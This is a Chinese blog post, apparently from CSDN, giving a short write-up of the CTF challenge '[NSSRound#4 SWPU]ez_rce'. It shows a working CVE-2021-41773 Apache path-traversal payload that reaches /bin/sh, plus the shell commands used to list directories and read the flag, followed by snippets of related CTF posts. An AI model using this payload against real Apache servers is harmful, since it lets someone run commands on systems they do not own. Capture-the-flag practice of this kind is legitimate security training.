[NSSRound#4 SWPU]ez_rce

最新推荐文章于 2024-04-27 15:27:13 发布
最新推荐文章于 2024-04-27 15:27:13 发布
阅读量504 收藏 1
点赞数
文章标签: linux apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73121489/article/details/130424579
版权

dirsearch扫目录也没有扫什么有用的出来
标签说是CVE-2021-41773(Apache HTTP Server路径穿越漏洞)
这里自行搜索了解

  1. BP抓包,改为POST形式传入下面的payload
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

在这里插入图片描述
2. 输入 echo;ls /
在这里插入图片描述

这里直接cat /flag_is here 是什么都没有的。
我一个个试了一遍,在run.sh里面找到了flag的真正位置

  1. echo;cat /run.sh

在这里插入图片描述
4. echo;cat /flag_is_here/2/0/7/6/flag

在这里插入图片描述

去选择自己的路
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[UUCTF 2022 新生赛]ez_rce(1),2024年大厂网络安全面经
m0_61549953的博客
04-06 853
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
[NSSRound#4] 复现
qq_61768489的博客
08-12 1140
可以看到下面的句子跟原棋盘数量一样,也就是我们要给原棋盘涂色,玩完之后能组成下面的句子并且颜色相符。是无法被正常解析的,所以需要修改签名,让他变成一个正常的phar文件还需要对phar文件进行修改。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。将文件压缩为zip文件,并把后缀改为png文件,这样文件内容和后缀白名单检测都绕过了。这里对文件后后缀进行了白名单,也对phar文件内容进行了检测,伪了绕过这两点。zip打不开,是把zip文件头换成rar了,换回去。.....
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
weixin_46497491的博客
11-07 3865
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce
XYCTF 部分web题解
最新发布
2302_77519243的博客
04-27 1228
XYCTF web
纳新复赛wp
qq_74655174的博客
02-22 251
纳新复赛wp
【Web】NSSRound#1-20 Basic 刷题记录(全)
uuzeray的博客
04-11 1860
3、之后执行content.innerHTML = data.message.content,发生报错,执行Error.prepareStackTrace,通过 callsite.getFunction()获取当前调用栈的函数,也就56-65这段的匿名函数,再callsite.getFunction()(),让这段匿名函数再次执行。1、插入了img标签,使得56-65这段匿名函数执行停止,去加载img外部引用,因为没有外部引用,所以触发img的error,执行js代码。提供应用的健康信息。
NSSCTF Round#7 Team ez_rce和0o0讲解
m0_64815693的博客
01-29 2629
NSSCTF Round#7 Team ez_rce和0o0讲解
swpu前端实验4的实验
04-23
4. 动态添加和删除表格行: - 添加数据:当用户输入信息并提交后,可以通过jQuery创建新的表格行元素,然后使用.append()方法将其添加到表格中。每行应包含用户输入的数据,可能还包括一个Delete按钮。 - 删除数据...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU大数据概论课程报告
01-31
SWPU大数据概论课程报告》是一份详细探讨大数据领域的学习资料,主要针对对大数据感兴趣的学员或研究人员。作为一份课程报告,它很可能包含了大数据的基本概念、核心技术、应用领域以及未来发展趋势等多个方面的...
[SWPUCTF 2021 新生赛]traditional
03-15
4. 加密和解密:八卦图密码可以用来加密和解密信息,它可以将信息转换为二进制数字,然后将其转换为 ASCII 码。 5. 计算机科学:八卦图密码和二进制数学是计算机科学中的基础,计算机网络、数据存储、算法设计等都是...
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2022UUCTF-web
bossDDYY的博客
11-03 1930
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
ezrce
lastwinn的博客
08-01 432
ezrce 打开题目看看 先注册一个账号 进去之后先创建一个项目 再添加一个接口 选择高级Mock,然后选择脚本,点击开启脚本,将payload放上去,点击保存 const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionCo...
[NSSRound#4 SWPU]1zweb
m0_70819573的博客
03-13 589
index.php中只需要绕过_wakeup魔术方法就行了,可以考虑增加自然属性个数或增加属性个数来绕过,因为upload.php会检查stub,所以压缩文件成zip(注意要用winhex改变属性个数,不然签名会改变),用phar://伪协议来读取文件。得到aa.phar.gz,改文件名为1.jpg上交,用phar读取发现签名损坏,所以要进行签名修复,phar由data,data签名(20位),和签名格式(8位)组成。可以用读取文件读取index.php,upload.php的源码。
CTF刷题记录(一)
m0_63441547的博客
06-15 245
把这个对象当成了字符串,所以调用了 day 类的 __toString() 方法,然后再调用 dark 类里的 go() 方法,然后在 go() 方法里把这个对象当成了方法使用,所以就去调用了 light 类的 __invoke 方法,又因为在 __invoke 方法里再次调用了一个不存在的 d() 方法,接着就会去调用 day 类里的 __call 方法,最后去调用 dark 类里的 getFlag() 方法。输出结果:O:5:"night":1:{s:5:"night";简单构造,有过滤,不行。
DASCTF July X CBCTF 4th--ezrce
qq_46263951的博客
08-05 273
YAPI Mock远程代码执行漏洞 YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,因此可以在脚本中植入命令,等用户访问接口发起请求时触发命令执行。 添加一个项目后,这里是最关键的 const sandbox = this const
Header:请求头参数详解
panying1的博客
12-08 2645
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值